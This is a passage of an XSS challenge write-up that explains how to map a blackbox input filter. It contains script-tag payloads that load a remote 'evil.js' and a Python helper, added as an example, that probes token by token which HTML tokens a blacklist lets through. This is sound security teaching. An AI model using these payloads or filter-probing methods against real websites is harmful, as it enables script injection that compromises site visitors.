
ZDResearch XSS challenge one writeup

Written by ZD. Posted in Blog

As you may already know, we recently held our very first XSS challenge, with the prize being an information security book of the winner's choice. The challenge was a bit tricky: if you did not focus on the right path you ended up with no results at all. We received around 10k requests (around 2MB of data; thanks for not using scanners) from attendees trying to solve it.

The challenge was built around three problems:

  • Reverse engineering of blackbox filters
  • Finding a way to bypass attribute RegExp filter
  • Finding a way to execute JavaScript without parenthesis

Now we will discuss all three problems…

Part I: Reverse engineering of filters

To determine and understand every input validation filter, you have to inject test inputs and observe what comes back. Since this is an XSS challenge, the inputs are HTML and JavaScript, and after a few tests you can see that some tags and some attributes are filtered.

The first test is obviously the script tag itself. I started by injecting the following payloads:

<script src="http://zdresearch.com/evil.js">
<%0ascript SrC="http://zdresearch.com/evil.js">

I got the following results:

[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : <_script_"_zdresearch_com_evil__">
[+] Injected Data : <scri_ipt>alert_0_;<_script>

At this point it is clear that the script tag is filtered. On top of that, the tokens src, /, http://, .js and () are all filtered and replaced by an underscore (_).
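
Notice how little the first combined payloads told us: a whole `<script src=...>` collapsed into a single `_`. The practical way to map a blackbox blacklist is to inject each candidate token on its own, wrapped in a harmless canary, and compare what is reflected. The script below is an added example and not part of the original challenge or of ZDResearch's code. The `simulated_filter` in it is a constructed stand-in that only mimics the behaviour reported above (blacklisted tokens replaced by `_`, matched case-insensitively); the real challenge filter was not published and, as the `<scri_ipt>` output shows, was more involved than this. Against a live target, `submit` would be an HTTP request that returns the reflected value instead.

```python
import re
from typing import Callable, Dict, Iterable

# Constructed stand-in for the challenge's blackbox filter. This is an assumption
# made for the example only: it models just the behaviour described in the
# writeup (blacklisted tokens replaced by "_", case-insensitively), not the
# unpublished real filter.
BLACKLIST = ["http://", "script", "src", ".js", "(", ")", "/"]
_BLACKLIST_RE = re.compile(
    # longest tokens first so "http://" wins over "/" at the same position
    "|".join(re.escape(t) for t in sorted(BLACKLIST, key=len, reverse=True)),
    re.IGNORECASE,
)


def simulated_filter(payload: str) -> str:
    """Replace every blacklisted token with a single underscore."""
    return _BLACKLIST_RE.sub("_", payload)


def probe_tokens(submit: Callable[[str], str], tokens: Iterable[str],
                 canary: str = "zdqx") -> Dict[str, str]:
    """Inject each token on its own, wrapped in canaries, and classify the reflection.

    `submit` returns the reflected value for an injected string (here the
    simulated filter; against a live target it would be an HTTP request).
    Verdicts: "passed", "removed", "rewritten -> '<what came back>'", or
    "context-broken" when the canaries themselves did not survive.
    """
    if submit(canary + canary) != canary + canary:
        raise ValueError("canary is itself filtered; choose another")
    verdicts: Dict[str, str] = {}
    for tok in tokens:
        reflected = submit(canary + tok + canary)
        if not (len(reflected) >= 2 * len(canary)
                and reflected.startswith(canary) and reflected.endswith(canary)):
            verdicts[tok] = "context-broken"
            continue
        inner = reflected[len(canary):len(reflected) - len(canary)]
        if inner == tok:
            verdicts[tok] = "passed"
        elif inner == "":
            verdicts[tok] = "removed"
        else:
            verdicts[tok] = f"rewritten -> {inner!r}"
    return verdicts


def case_insensitive_block(submit: Callable[[str], str], token: str) -> bool:
    """True when lower, upper and mixed-case spellings of `token` are all mangled.

    A blacklist that only blocks one spelling is bypassed trivially (e.g. SrC),
    so this is the first variation worth checking for any blocked token.
    """
    variants = {token.lower(), token.upper(), token[:1].upper() + token[1:].lower()}
    return all(v != "passed" for v in probe_tokens(submit, variants).values())


if __name__ == "__main__":
    # The writeup's first payload: one combined probe collapses into underscores
    # and says little about which individual tokens triggered the filter.
    print(simulated_filter('<script src="http://zdresearch.com/evil.js">'))
    # Probing token by token separates blocked tokens from allowed ones.
    for tok, verdict in probe_tokens(
            simulated_filter,
            ["script", "src", "href", "/", "(", ")", "onclick", "img"]).items():
        print(f"{tok!r:12} {verdict}")
    print("script blocked case-insensitively:",
          case_insensitive_block(simulated_filter, "script"))
```

The canary check at the top matters more than it looks: if the filter also touches your delimiter, every verdict is garbage, so verify the canary reflects cleanly before trusting any result. The allowed tokens (here `href`, `onclick`, `img`) are exactly the building blocks the next part of the writeup works with.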
So we have to find a tag that is not filtered and that takes attributes; for example, we can go for a tag with an href attribute: